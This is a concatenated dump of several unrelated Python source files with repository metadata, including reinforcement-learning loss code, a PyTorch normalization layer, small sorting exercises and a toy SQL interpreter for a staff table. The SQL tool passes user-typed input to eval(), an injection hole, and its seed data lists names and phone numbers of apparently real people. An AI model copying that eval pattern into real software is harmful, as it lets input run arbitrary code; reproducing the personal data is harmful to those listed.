len_IntermediateReward = torch.sum(self.mask_IntermediateReward, dim=2)
fraclen_IntermediateReward = (1.0/float(self.num_timesteps))*len_IntermediateReward
prob_intermediate = torch.mul(fraclen_IntermediateReward, prob_intermediate)
log_prob_intermediate = torch.log(prob_intermediate)
unbackpropable_intermediate_prob = prob_intermediate.detach()#requires_grad_(False)
baseline_ir = torch.sum(torch.mul(unbackpropable_intermediate_prob,int_reward), dim = 1, keepdim=True)
#combining stuff
new_baseline = current_baseline + baseline_ir
new_baseline = torch.div(new_baseline,torch.sum(self.ProgramProb,dim=1,keepdim=True)+torch.sum(unbackpropable_intermediate_prob,dim=1,keepdim=True))
#self.OldBaseline = tf.placeholder(tf.float32,[self.batch_size,1])
final_baseline = new_baseline.detach()
#final_baseline = (final_baseline + 0.5*self.OldBaseline)/1.5
#coming back to reinforce_main
scaling_term_1 = torch.mul(self.ProgramProb,self.Reward-final_baseline).detach()
loss_reinforce = torch.mul(self.logProgramProb, scaling_term_1)
# if overall_step_count<=15:
#loss_reinforce = torch.mul(loss_reinforce,mask_cnf)
loss_reinforce = torch.where(torch.isnan(loss_reinforce), torch.zeros_like(loss_reinforce, device=self.device), loss_reinforce)
loss_reinforce = torch.sum(torch.mean(loss_reinforce, dim = 0))
#coming back to intermediate reward part
scaling_term_2 = torch.mul(self.IfPosIntermediateReward,torch.mul((int_reward - final_baseline) ,unbackpropable_intermediate_prob)).detach()
loss_ir = torch.mul(scaling_term_2, log_prob_intermediate)
loss_ir = torch.where(torch.isnan(loss_ir), torch.zeros_like(loss_ir, device=self.device), loss_ir)
loss_ir = torch.sum(torch.mean(loss_ir,dim=0))
relaxed_scaling_term_1 = torch.mul(self.ProgramProb, self.Relaxed_reward-current_baseline_relaxed).detach()
loss_relaxed_reinforce = torch.mul(self.logProgramProb, relaxed_scaling_term_1)
loss_relaxed_reinforce = torch.where(torch.isnan(loss_relaxed_reinforce), torch.zeros_like(loss_relaxed_reinforce, device=self.device),\
loss_relaxed_reinforce)
loss_relaxed_reinforce = torch.sum(torch.mean(loss_relaxed_reinforce,dim=0))
self.entropy = torch.where(torch.isnan(self.entropy), torch.zeros_like(self.entropy, device=self.device), self.entropy)
self.entropy = self.entropy/self.batch_size
loss = loss_reinforce + self.params['Rate_Entropy']*self.entropy + self.rate_intermediate_reward*loss_ir +\
torch.mul(self.relaxed_reward_multipler, loss_relaxed_reinforce)
self.loss = loss
return loss
#val_grad_fn = tfe.value_and_gradients_function(reinforce)#tfe.implicit_gradients(self.reinforce)
#value, grads_and_vars = val_grad_fn()
#print grads_and_vars
#self.optimizer.apply_gradients(grads_and_vars)#feed_dict2))
#return value
return reinforce()
def recursive_joint_prob_generator(self,list_dists):
if len(list_dists) == 2:
dist_1 = list_dists[0].view([-1,1])
dist_2 = list_dists[1].view([-1,1])
out = torch.matmul(dist_1,torch.transpose(dist_2,1,0))
return out
else:
current_dist = list_dists[-1]
#has shape batch_size x max_num_var
new_list_dists = list_dists[0:-1]
probs_list = list(torch.unbind(current_dist, dim = 0))
penultimate_output = self.recursive_joint_prob_generator(new_list_dists)
#has shape batch_size x max_num_var x max_num_var ....
out = []
for prob in probs_list:
#prob is tensor of shape batch_size
out.append(torch.mul(penultimate_output,prob))
return torch.stack(out,dim = len(list_dists)-1)
def map_index_to_unflattened(self,number,shape):
out = []
for divisor in shape[::-1]:
remainder = torch.remainder(number,divisor).type(self.dtype_int64)#number // divisor
number = torch.div(number.type(self.dtype_float),float(divisor)).floor_()#number % divisor
out.append(remainder)
#print 'remainder ', remainder
return out[::-1]
def map_index_to_flattened(self,number, dimensions):
number = number.type(self.dtype_int64)
one = torch.tensor(1,dtype=self.dtype_int64,device=self.device)
dimensions = list(torch.unbind(torch.tensor(dimensions, dtype=self.dtype_int64, device=self.device), dim = 0))
dimensions.append(one)
out = []
for i in range(0,len(dimensions)-1):
out.append(torch.prod(torch.stack(dimensions[i+1:] , dim = 0) ,dim = 0))
out = torch.stack(out)
out = torch.mul(number,out)
out = torch.sum(out, len(number.shape)-1)
return out
def immutable_scatter_nd_constant_update(self, inp1, inp2, inp3):
shape = inp1.shape
# inp1 = tf.to_float(inp1)
inp1 = inp1.contiguous().view([-1]) #this reshaping cannot be avoided
inp2 = self.map_index_to_flattened(inp2, shape)
z1 = self.one_hot(inp2, list(inp1.shape)[0], dtype=inp3.dtype)
z2 = inp3.view([-1,1])
z3 = torch.mul(z1,z2)
update_input = torch.sum(z3+torch.zeros_like(inp1, device=self.device, dtype=inp3.dtype),dim = 0)
m1 = torch.sum(z1, dim = 0).type(inp1.dtype)
m1 = 1-m1
new_inp1 = torch.mul(inp1,m1)
out = new_inp1 + update_input.type(new_inp1.dtype)
return out.view(shape)
def immutable_scatter_nd_1d_update(self, inp1, inp2, inp3):
shape = inp1.shape
dim = shape[-1]
index_shape = shape[0:-1]
# inp1 = tf.to_float(inp1)
inp1 = inp1.contiguous().view([dim, -1]) #this reshaping cannot be avoided
inp2 = self.map_index_to_flattened(inp2, index_shape)
z1 = self.one_hot(inp2, inp1.shape[1], dtype=inp3.dtype)
z1 = torch.unsqueeze(torch.transpose(z1,1,0),dim = 2)
z2 = inp3.view([-1,dim])
z3 = torch.mul(z2,z1)
update_input = torch.sum(z3,dim = 1)
m1 = torch.sum(z1, dim = 1)
m1 = 1-m1
inp1 = inp1.view([-1, dim])
new_inp1 = torch.mul(inp1,m1)
out = new_inp1+update_input
return out.view(shape)
def beam_switch(self, old_prop_val, new_beam_ids):
# the matrix should be input in the shape beam_size x batch_size x Tensor_shape
old_shape = old_prop_val.shape
old_prop_val = old_prop_val.contiguous().view([self.beam_size, self.batch_size, -1]) #this reshaping cannot be avoided
new_prop_val = []
expanded_beam_ids = self.one_hot(new_beam_ids, depth = self.beam_size, dtype=old_prop_val.dtype)
#expanded_beam_ids has shape beam_size x batch_size x beam_size
expanded_beam_ids = torch.transpose(expanded_beam_ids,2,1)
for multiplier in list(torch.unbind(expanded_beam_ids,dim=0)):
multiplier = torch.unsqueeze(multiplier,dim=-1)
new_prop_val.append(torch.sum(torch.mul(multiplier,old_prop_val), dim = 0))
new_prop_val = torch.stack(new_prop_val,dim = 0)
new_prop_val = new_prop_val.view(old_shape)
return new_prop_val
def bernoulli_program_sampling(self,distribution, k):
out1_vals, out1_ind = torch.topk(distribution, k)
if self.params["explore"][0] is -1:
return out1_vals, out1_ind
p = torch.randn([])>self.randomness_threshold_beam_search
p = p.type(self.dtype_float)
# temp = torch.stack([torch.randperm(self.num_progs) for _ in xrange(self.batch_size)],dim=0)
out2_ind = torch.randint_like(out1_ind,0,self.num_progs, device=self.device)#temp[:,0:k]
multiplicand_1 = self.one_hot(out2_ind, depth=self.num_progs)
multiplicand_1 = multiplicand_1.permute([1,0,2])
out2_vals = torch.sum(torch.mul(multiplicand_1.type(distribution.dtype), distribution), dim=2)
out2_vals = out2_vals.permute([1,0])
out_ind = p*out1_ind.type(p.dtype)+(1-p)*out2_ind.type(p.dtype)
out_vals = p*out1_vals+(1-p)*out2_vals
return out_vals, out_ind.type(self.dtype_int64)
def one_hot(self,batch,depth,dtype=None):
n_dims = depth
y_tensor = batch
y_tensor = y_tensor.contiguous().view(-1, 1)
y_one_hot = torch.zeros(y_tensor.size()[0], n_dims, dtype = self.dtype_int64, device=self.device).scatter_(1, y_tensor.type(self.dtype_int64), 1)
y_one_hot = y_one_hot.view(*(list(batch.shape)+[-1]))
if dtype is None:
return y_one_hot
return y_one_hot.type(dtype)
|
[
"ansarighulamahmed@gmail.com"
] |
ansarighulamahmed@gmail.com
|
7f2f1467802cb3bede6075fc24762ea10ad53e32
|
aabcf2cd893dd8d938cb538956662d28cabd5074
|
/sql_staff.py
|
dceca10b6406739007246d23c9d20e9be816b14f
|
[] |
no_license
|
vincenshen01/oldboy-day03
|
31afea1af7eb709aa3a2a87d2749eef8e40f3583
|
78b913de7320b9d0761c0d6132c7002fd3869eda
|
refs/heads/master
| 2021-06-13T22:30:14.361568
| 2017-02-08T15:40:16
| 2017-02-08T15:40:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,833
|
py
|
import re,sys,os
from prettytable import PrettyTable
class SQL_Staff(object):
def __init__(self, *args):
self.staff_list = []
self.staff_list2 = []
self.staff_count = 0
self.staff_id = 0
self.syntax = self.syntax_check(args[0]) # 语法检查
def select(self):
staffs_info = self.__data_read(self.syntax[3]) # 获取staff数据列表
field_names = self.syntax[1].split(",")
for staff in staffs_info:
self.staff_list = []
staff_dict = self.data_process(staff) # 获取staff数据字典
if self.where_check(self.syntax,staff_dict): # Where条件判断
for field in field_names:
self.staff_list.append(staff_dict.get(field))
self.staff_list2.append(self.staff_list)
self.staff_count += 1
self.pt_staff_data(field_names,self.staff_list2) # 打印查询到的staff信息
print("总共查找到%d条记录!" %self.staff_count)
def update(self):
staffs_info = self.__data_read(self.syntax[1]) # 获取staff数据列表
for staff in staffs_info:
staff_dict = self.data_process(staff) # 获取staff数据字典
if self.where_check(self.syntax,staff_dict): # Where条件判断
update_set = self.syntax[3].split("=")
if "\"" in update_set[1]:
staff_dict[update_set[0]] = update_set[1][1:-1]
else:
staff_dict[update_set[0]] = update_set[1]
self.staff_count += 1
self.staff_list.append(self.staff_info_str(staff_dict)) # 将字典转换为字符串
self.__data_write(self.syntax[1],self.staff_list) # 数据写回文件
print("操作成功,总共更新%d条记录!" %self.staff_count)
def delete(self):
staff_info = self.__data_read(self.syntax[2]) #获取staff数据列表
for staff in staff_info:
self.staff_id += 1
staff_dict = self.data_process(staff) # 获取staff数据字典
if self.where_check(self.syntax,staff_dict): # 判断语法结构
self.staff_count += 1
self.staff_id -= 1
continue
else:
staff_dict['staff_id'] = str(self.staff_id) # 更新staff_id
self.staff_list.append(self.staff_info_str(staff_dict)) # 将字典转换为字符串
self.__data_write(self.syntax[2],self.staff_list) # 数据写回文件
print("操作成功,总共删除%d条记录!" %self.staff_count)
def insert(self):
staff_info = self.__data_read(self.syntax[2]) # 获取staff数据列表
staff_values = re.split(r',',self.syntax[4])
for i in range(len(staff_values)): # 去掉引号
if "\"" in staff_values[i]:
staff_values[i] = staff_values[i].strip("\"")
for staff in staff_info:
staff_dict = self.data_process(staff) # 获取staff数据字典
if staff_values[2] in staff:
print("Staff Phone已存在,不允许重复值!")
return
else:
self.staff_list.append(self.staff_info_str(staff_dict)) # 将字典转换为字符串
self.staff_list.append(",".join([str(len(staff_info)+1),staff_values[0],staff_values[1],staff_values[2],staff_values[3],staff_values[4]])) # 将新增staff数据放到列表最后
self.__data_write(self.syntax[2],self.staff_list) # 数据写回文件
print("成功插入1条记录!")
def __data_read(self,file_name): # 读取文件内容,返回列表
staff_info = []
with open(file_name,"r",encoding="utf-8") as f:
for line in f.readlines():
staff_info.append(line.strip())
return staff_info
def __data_write(self,file_name,staff_info): # 将列表转换为字符串,并写入文件
staff_str = ""
with open(file_name,"w",encoding="utf-8") as f:
for line in staff_info:
staff_str += str(line) + "\n"
f.write(staff_str)
def data_process(self,data): # 将staff数据转换为字典
student_info = data.split(',')
staff_dict = {'staff_id': student_info[0], 'name': student_info[1], 'age': student_info[2],
'phone': student_info[3], 'dept': student_info[4], 'enroll_date': student_info[5]}
return staff_dict
def pt_staff_data(self,fields_names,staff_data): # 格式化打印
pt_info = PrettyTable()
pt_info.field_names = fields_names
for staff in staff_data:
pt_info.add_row(staff)
print(pt_info)
def syntax_check(self,syntax): # 检查语法结构,并做相应的转换
if (syntax[2].lower() == "from" or syntax[2].lower() == "set")\
and syntax[4].lower() == "where" and len(syntax) == 8:
if "\"" in syntax[7]:
syntax[7] = syntax[7][1:-1]
if syntax[1] == "*":
syntax[1] = "staff_id,name,age,phone,dept,enroll_date"
return syntax
elif syntax[1].lower() == "from" and syntax[3].lower() == "where" and len(syntax) == 7:
if "\"" in syntax[6]:
syntax[6] = syntax[6][1:-1]
return syntax
elif syntax[1].lower() == "into" and syntax[3].lower() == "values":
syntax[4] = syntax[4][1:-1]
return syntax
else:
sys.exit("语句错误,请重试!")
def where_check(self,syntax,staff_dict): # 判断where条件是否成立
try:
if len(syntax) == 8 and ((syntax[6] == "like" and ((syntax[7]) in staff_dict[syntax[5]])) or \
(syntax[6] == "=" and syntax[7] == staff_dict[syntax[5]]) or \
((syntax[6] not in ["=", "like"]) and eval(staff_dict[syntax[5]] + syntax[6] + syntax[7]))):
return True
if len(syntax) == 7 and ((syntax[5] == "like" and ((syntax[6]) in staff_dict[syntax[4]])) or \
(syntax[5] == "=" and syntax[6] == staff_dict[syntax[4]]) or \
((syntax[5] not in ["=","like"]) and eval(staff_dict[syntax[4]]+syntax[5]+syntax[6]))):
return True
except Exception as e:
sys.exit("字段名错误,请重新输入!!!")
def staff_info_str(self,staff_dict): # 将字典转换为字符串
staff_info= [staff_dict['staff_id'], staff_dict['name'], staff_dict['age'],staff_dict['phone'], staff_dict['dept'],staff_dict['enroll_date']]
return ",".join(staff_info)
if os.path.isfile("staff_table") == False:
staff_lists = [
"1,李啸宇,22,13564081679,运维,2017-01-01",
"2,高君,29,13911523752,IT,2014-08-02",
"3,徐鹏,25,13811436953,运维,2015-01-01",
"4,王耀华,77,13461044075,实习生,1937-01-21",
"5,李家旺,69,17191195862,实习生,2017-01-21",
"6,李西昌,27,17733786749,运维,2017-01-21",
"7,李梦林,26,15910631989,QA,2016-10-11",
"8,朱世阳,24,17744498194,运维,2017-01-07",
"9,范洪涛,22,18611044558,运维,2017-01-01",
"10,沈洪斌,29,18518740102,运维,2016-10-12",
"11,李向阳,24,13622004447,运维,2017-01-01",
"12,曲喆,42,18911324106,DBA,2017-01-20",
"13,郭奇锋,26,18211144618,自动化测试,2017-01-15",
"14,邱峰,30,18910627886,运维,2000-01-01",
"15,贺磊,30,18500644534,开发,1998-07-01"
]
staff_str = ""
with open("staff_table", "w", encoding="utf-8") as f:
for line in staff_lists:
staff_str += str(line) + "\n"
f.write(staff_str)
if __name__ == '__main__':
sql_doc = '''
支持的SQL语法示例如下:
* 查询: select staff_id,name,age from staff_table where age > 22
select * from staff_table where enroll_date like "2017"
select * from staff_table where name = "沈洪斌"
* 修改: update staff_table set dept="IT" where name = "沈洪斌"
* 新增: insert into staff_table values ("Alex",33,13812345678,"讲师",2010-01-01)
* 删除: delete from staff_table where staff_id = 4
'''
print(sql_doc)
while True:
sql_input = input("Please input SQL or Quit to exit >>>").strip()
if len(sql_input) == 0:
continue
elif sql_input == "exit()":
sys.exit("Bye!")
try:
sql_list = re.split(r'\s+',sql_input)
sql_func = SQL_Staff(sql_list)
getattr(sql_func,sql_list[0].lower())()
except AttributeError as e:
print("语句错误,请重新输入!!")
|
[
"vincen_shen01@163.com"
] |
vincen_shen01@163.com
|
92b1d60775c5a946e457588e4223c33d69c9f03f
|
c744fb3edb70399674bcbbeaeec36324795eb968
|
/tests/env_test.py
|
c5f52fd43e87c8acd06e2f539e0217278791a5bf
|
[] |
no_license
|
koulanurag/gym_x
|
821bccd76954d56198f040600955c04d2df8305b
|
e10214b71ade1e4d1696ef7ba083aad2be035073
|
refs/heads/master
| 2020-03-24T02:12:00.040812
| 2019-06-13T06:36:10
| 2019-06-13T06:36:10
| 142,366,133
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,118
|
py
|
import gym, gym_x
import os
import random
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='test env')
parser.add_argument('--env', default='GoldRushRead-v0', help="Name of the environment")
args = parser.parse_args()
env = gym.make(args.env)
env.seed(0)
done = False
for ep in range(100):
done = False
obs = env.reset()
action = env.env.get_desired_action()
total_reward = 0
all_observations = [obs]
all_actions = [action]
while not done:
obs, reward, done, info = env.step(action)
action = env.env.get_desired_action()
total_reward += reward
if not done:
all_observations.append(obs)
all_actions.append(action)
print('Episode: {} Total Reward: {} Obs: {}, Action: {}'.format(ep, total_reward,
''.join([str(_[0]) for _ in all_observations]),
all_actions))
|
[
"koulanurag@gmail.com"
] |
koulanurag@gmail.com
|
855736cd1ff23002cda173ae8226d00a61d94c28
|
98f1ba8d6e4e8bacda4b8d0a6e08c05a7e426ee9
|
/padertorch/contrib/je/modules/norm.py
|
d37aa091803040d95ca0ac0b308d73ca8a63d6b6
|
[
"MIT"
] |
permissive
|
FrederikRautenberg/padertorch
|
f73aa70ae4d79cc216c78d480fe6e1f2f1642a05
|
f33d38d944df1db955ad16af1fa7e6d9f3c47441
|
refs/heads/master
| 2022-12-19T10:07:16.658898
| 2020-06-10T18:01:17
| 2020-06-10T18:01:17
| 271,998,030
| 0
| 0
| null | 2020-06-13T11:45:07
| 2020-06-13T11:45:07
| null |
UTF-8
|
Python
| false
| false
| 12,085
|
py
|
import torch
from padertorch.base import Module
from torch import nn
from torch.autograd import Function
from padertorch.contrib.je.modules.global_pooling import compute_mask
class Norm(Module):
"""
>>> norm = Norm(data_format='bct', shape=(None, 10, None), statistics_axis='bt', momentum=0.5, interpolation_factor=1.)
>>> x, seq_len = 2*torch.ones((3,10,4)), [1, 2, 3]
>>> norm.running_mean
tensor([[[0.],
[0.],
[0.],
[0.],
[0.],
[0.],
[0.],
[0.],
[0.],
[0.]]])
>>> norm.running_power
tensor([[[1.],
[1.],
[1.],
[1.],
[1.],
[1.],
[1.],
[1.],
[1.],
[1.]]])
>>> x = norm(x, seq_len)
>>> norm.running_mean
tensor([[[1.],
[1.],
[1.],
[1.],
[1.],
[1.],
[1.],
[1.],
[1.],
[1.]]])
>>> norm.running_power
tensor([[[2.5000],
[2.5000],
[2.5000],
[2.5000],
[2.5000],
[2.5000],
[2.5000],
[2.5000],
[2.5000],
[2.5000]]])
"""
def __init__(
self,
data_format='bcft',
shape=None,
*,
statistics_axis='bft',
independent_axis='c',
batch_axis='b',
sequence_axis='t',
shift=True,
scale=True,
eps: float = 1e-3,
momentum=0.95,
interpolation_factor=0.,
):
super().__init__()
self.data_format = data_format.lower()
self.batch_axis = None if batch_axis is None \
else data_format.index(batch_axis.lower())
self.sequence_axis = None if sequence_axis is None \
else data_format.index(sequence_axis.lower())
self.statistics_axis = tuple(
[data_format.index(ax.lower()) for ax in statistics_axis]
)
self.shift = shift
self.scale = scale
self.eps = eps
self.track_running_stats = batch_axis in statistics_axis
if self.track_running_stats:
reduced_shape = [*shape]
for ax in self.statistics_axis:
reduced_shape[ax] = 1
assert not any([d is None for d in reduced_shape])
self.register_buffer(
'num_tracked_values', torch.zeros(reduced_shape)
)
if shift:
self.register_buffer('running_mean', torch.zeros(reduced_shape))
else:
self.register_parameter('running_mean', None)
if scale:
self.register_buffer('running_power', torch.ones(reduced_shape))
else:
self.register_parameter('running_power', None)
else:
self.register_parameter('num_tracked_values', None)
self.register_parameter('running_mean', None)
self.register_parameter('running_power', None)
self.momentum = momentum
assert 0. <= interpolation_factor <= 1., interpolation_factor
self.interpolation_factor = interpolation_factor
if independent_axis is not None:
reduced_shape = len(data_format) * [1]
for ax in independent_axis:
ax = data_format.index(ax.lower())
assert shape[ax] is not None, shape[ax]
reduced_shape[ax] = shape[ax]
if scale:
self.gamma = nn.Parameter(
torch.ones(reduced_shape), requires_grad=True
)
else:
self.gamma = None
if self.shift:
self.beta = nn.Parameter(
torch.zeros(reduced_shape), requires_grad=True
)
else:
self.beta = None
else:
self.gamma = None
self.beta = None
@property
def runnning_var(self):
n = torch.max(self.num_tracked_values, 2. * torch.ones_like(self.num_tracked_values))
running_var = self.running_power
if self.shift:
running_var = n / (n-1) * (running_var - self.running_mean ** 2)
running_var = running_var + self.eps
assert (running_var >= 0).all(), running_var.min()
return running_var
def reset_running_stats(self):
if self.track_running_stats:
self.num_tracked_values.zero_()
if self.shift:
self.running_mean.zero_()
if self.scale:
self.running_power.fill_(1)
def reset_parameters(self):
self.reset_running_stats()
if self.gamma is not None:
nn.init.ones_(self.gamma.scale)
if self.beta is not None:
nn.init.zeros_(self.beta.shift)
def forward(self, x, seq_len=None):
if self.training or not self.track_running_stats:
y, mean, power, n_values = normalize(
x, gamma=self.gamma, beta=self.beta,
statistics_axis=self.statistics_axis,
batch_axis=self.batch_axis, sequence_axis=self.sequence_axis,
seq_len=seq_len, shift=self.shift, scale=self.scale,
eps=self.eps
)
if self.track_running_stats:
self.num_tracked_values += n_values.data
if self.momentum is None:
momentum = 1 - n_values / self.num_tracked_values.data
else:
momentum = self.momentum
if self.shift:
self.running_mean *= momentum
self.running_mean += (1 - momentum) * mean.data
power = power.data + mean.data ** 2
if self.scale:
self.running_power *= momentum
self.running_power += (1 - momentum) * power.data
if self.interpolation_factor > 0.:
# perform straight through backpropagation
# https://arxiv.org/pdf/1611.01144.pdf
y_ = x
if self.shift:
y_ = y_ - self.running_mean
if self.scale:
y_ = y_ / torch.sqrt(self.runnning_var)
y = y + self.interpolation_factor * (y_ - y).detach()
y = y * compute_mask(x, seq_len, self.batch_axis, self.sequence_axis)
else:
y = x
if self.shift:
y = y - self.running_mean.data
if self.scale:
y = y / torch.sqrt(self.runnning_var)
if self.gamma is not None:
y = y * self.gamma
if self.beta is not None:
y = y + self.beta
y = y * compute_mask(x, seq_len, self.batch_axis, self.sequence_axis)
return y
def inverse(self, x):
if not self.track_running_stats:
raise NotImplementedError
if self.beta is not None:
x = x - self.beta
if self.gamma is not None:
x = x / self.gamma
if self.scale:
x = torch.sqrt(self.running_var) * x
if self.shift:
x = x + self.running_mean
return x
class Normalize(Function):
@staticmethod
def forward(ctx, x, gamma, beta, statistics_axis, batch_axis, sequence_axis, seq_len, shift, scale, eps):
ctx.statistics_axis = statistics_axis
ctx.batch_axis = batch_axis
ctx.sequence_axis = sequence_axis
ctx.seq_len = seq_len
ctx.shift = shift
ctx.scale = scale
ctx.eps = eps
# compute mask
if seq_len is not None:
mask = compute_mask(x, seq_len, batch_axis, sequence_axis)
else:
mask = torch.ones_like(x)
# compute statistics
n_values = mask.sum(dim=statistics_axis, keepdim=True)
x = x * mask
mean = x.sum(dim=statistics_axis, keepdim=True) / torch.max(n_values, torch.ones_like(n_values))
power = (x ** 2).sum(dim=statistics_axis, keepdim=True) / torch.max(n_values, torch.ones_like(n_values))
y = x
if shift:
y = y - mean
power = power - mean**2
if scale:
y = y / torch.sqrt(power + eps)
ctx.save_for_backward(x, gamma, beta, mean, power)
if gamma is not None:
assert gamma.dim() == x.dim(), gamma.shape
y = y * gamma
if beta is not None:
assert beta.dim() == x.dim(), beta.shape
y = y + beta
return y*mask, mean, power, n_values
@staticmethod
def backward(ctx, grad_y, grad_mean, grad_power, _):
if (grad_mean != 0).any() or (grad_power != 0).any():
raise NotImplementedError
x, gamma, beta, mean, power = ctx.saved_tensors
# compute mask
if ctx.seq_len is not None:
mask = compute_mask(x, ctx.seq_len, ctx.batch_axis, ctx.sequence_axis)
else:
mask = torch.ones_like(x)
n_values = mask.sum(dim=ctx.statistics_axis, keepdim=True)
grad_y = grad_y * mask
x_hat = x
scale = torch.sqrt(power + ctx.eps)
if ctx.scale:
x_hat = x_hat - mean
if ctx.scale:
x_hat = x_hat / scale
if beta is None:
grad_beta = None
else:
reduce_axis = [i for i in range(beta.dim()) if beta.shape[i] == 1]
grad_beta = grad_y.sum(reduce_axis, keepdim=True)
if gamma is None:
grad_gamma = None
grad_x_hat = grad_y
else:
reduce_axis = [i for i in range(gamma.dim()) if gamma.shape[i] == 1]
grad_gamma = (grad_y * x_hat).sum(reduce_axis, keepdim=True)
grad_x_hat = grad_y * gamma
if ctx.shift:
x = (x - mean) * mask
grad_mean_ = -grad_x_hat.sum(ctx.statistics_axis, keepdim=True)
if ctx.scale:
grad_power_ = (grad_x_hat * x).sum(ctx.statistics_axis, keepdim=True) * (-1 / 2) * (power + ctx.eps) ** (-3 / 2)
if ctx.shift:
grad_mean_ = (
grad_mean_ / scale
- 2 * grad_power_ * x.sum(ctx.statistics_axis, keepdim=True) / n_values
)
grad_x = grad_x_hat
if ctx.scale:
grad_x = grad_x / scale + grad_power_ * 2 * x / n_values
if ctx.shift:
grad_x = grad_x + grad_mean_ / n_values
return grad_x * mask, grad_gamma, grad_beta, None, None, None, None, None, None, None
def normalize(x, gamma, beta, statistics_axis, batch_axis, sequence_axis, seq_len, shift, scale, eps):
"""
>>> x, seq_len = 2*torch.ones((3,10,4)), [1, 2, 3]
>>> x, m, p, n = normalize(x, None, None, [0, 2], 0, 2, seq_len, True, True, 1e-3)
>>> m
tensor([[[2.],
[2.],
[2.],
[2.],
[2.],
[2.],
[2.],
[2.],
[2.],
[2.]]])
>>> p
tensor([[[0.],
[0.],
[0.],
[0.],
[0.],
[0.],
[0.],
[0.],
[0.],
[0.]]])
>>> n
tensor([[[6.],
[6.],
[6.],
[6.],
[6.],
[6.],
[6.],
[6.],
[6.],
[6.]]])
"""
return Normalize.apply(x, gamma, beta, statistics_axis, batch_axis, sequence_axis, seq_len, shift, scale, eps)
class PrintGrad(Function):
@staticmethod
def forward(ctx, input, i=0):
ctx.i = i
return input
@staticmethod
def backward(ctx, grad_output):
print(ctx.i, grad_output.max().item())
assert not torch.isnan(grad_output).any()
return grad_output, None
|
[
"ebbers@nt.upb.de"
] |
ebbers@nt.upb.de
|
18a6809874be3f707774fe846eb234dd96ce85cf
|
a5d947fc7f253c8a27bfd022da652da56a9b31e2
|
/sem1/alglabs/lab2.py
|
a9d027b031f6bf38286d4b8890d5afddf371f492
|
[] |
no_license
|
Aneryd/labs
|
8474597ac3d6c78877855cc5968538a36ec43109
|
d1685fd57e2187b0a76dc8008fbc7fa3c1b9e58b
|
refs/heads/master
| 2021-06-27T20:43:21.690976
| 2021-01-29T08:04:51
| 2021-01-29T08:04:51
| 213,151,395
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 612
|
py
|
from random import randint
def insertion_sort(nums):
n = 0
for i in range(1, len(nums)):
item_to_insert = nums[i]
j = i - 1
n += 1
while j >= 0 and nums[j] > item_to_insert:
nums[j + 1] = nums[j]
j -= 1
nums[j + 1] = item_to_insert
lists = [2, 0, 11, 4, 23, 1, 3, 41, 23, 5, 24, 54, 76, 14, 99]
print(lists)
n = 0
insertion_sort(lists)
print(lists)
for i in range(len(lists)):
n += 1
if n == 5:
lists.insert(5, 0)
elif n == 10:
lists.insert(11, 0)
elif n == 15:
lists.insert(17, 0)
print(lists)
|
[
"andrey.zhalo@mail.ru"
] |
andrey.zhalo@mail.ru
|
2c69d24430d77f75815399f9f178d6f0ae2fd184
|
d49d212da98803dc304603fa64bd9e92dc62f10a
|
/code/contextual_embeddings/ner2disrpt.py
|
0d781d50bde2b561c8a973806fd58d823f81b47d
|
[] |
no_license
|
mortezaezzabady/discut
|
5fbf085a89cec88007f1c588f2b566d404fc2ef6
|
7123c4b1034de2dfff0a389d13e7fefaaf6356c5
|
refs/heads/main
| 2023-07-22T08:24:56.927207
| 2021-08-24T15:17:52
| 2021-08-24T15:17:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 761
|
py
|
"""
maps conll 2003 format (4 fields) to Disrpt expected conll formats (10 fields)
"""
import sys
maptags = {"_":"O",
"BeginSeg=Yes": "B-S",
"Seg=B-Conn":"B-Conn",
"Seg=I-Conn":"I-Conn",
"SpaceAfter=No":"O",
"Typo=Yes":"O",
}
inv_map_tags = {maptags[k]:k for k in maptags}
inv_map_tags["O"]="_"
with open(sys.argv[1]) as f:
output = []
idx = 1
for line in f:
if line.strip()=="":
output.append("")
idx = 1
else:
token, pos, chk, label = line.strip().split()
newline = [str(idx),token]+["_"]*7+[inv_map_tags[label]]
idx = idx + 1
output.append("\t".join(newline))
print("\n".join(output))
|
[
"morteza758@gmail.com"
] |
morteza758@gmail.com
|
3e670dafd6105727af35b2c1edecdf612c7eaaad
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/gphnuvoHDANN2Fmca_24.py
|
cc723449996b7ca6f4347f660b50e68d96b1e7fc
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 820
|
py
|
"""
Write a function that sorts **only the odd numbers** in a list in **ascending
order** , keeping the even numbers in their current place.
For example, if our input list is: `[5, 2, 6, 6, 1, 4, 9, 3]`:
[_, 2, 6, 6, _, 4, _, _] # Keep evens in place.
# Sort odds: [5, 1, 9, 3] => [1, 3, 5, 9]
[1, 2, 6, 6, 3, 4, 5, 9] # Final list.
### Examples
odd_sort([7, 5, 2, 3, 1]) ➞ [1, 3, 2, 5, 7]
odd_sort([3, 7, 0, 9, 3, 2, 4, 8]) ➞ [3, 3, 0, 7, 9, 2, 4, 8]
odd_sort([2, 2, 8, 4]) ➞ [2, 2, 8, 4]
odd_sort([7, 9, 7]) ➞ [7, 7, 9]
### Notes
Lists may contain duplicate numbers.
"""
def odd_sort(lst):
odds = [i for i in lst if i%2==1]
odds.sort()
for i in range (len(lst)):
if lst[i]%2==1:
lst[i] = odds[0]
odds.pop(0)
return lst
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
e3df5f60e8f13566f68b8032c04d3e39dc02df98
|
9e098cf8931ec3db0c6a3294cee5fddfb347f260
|
/mob/wsgi.py
|
013fd00cec267bb425b90b5c62929d3806c1d49b
|
[] |
no_license
|
rcmiskin10/django-react-boilerplate
|
38f92b8cc079a9c8c11f042bc6abbbe533a3b1d5
|
49d25b611433cc1213d2794ef71ec339116ab136
|
refs/heads/master
| 2022-12-13T18:38:54.540780
| 2018-10-17T15:40:11
| 2018-10-17T15:40:11
| 153,481,193
| 0
| 0
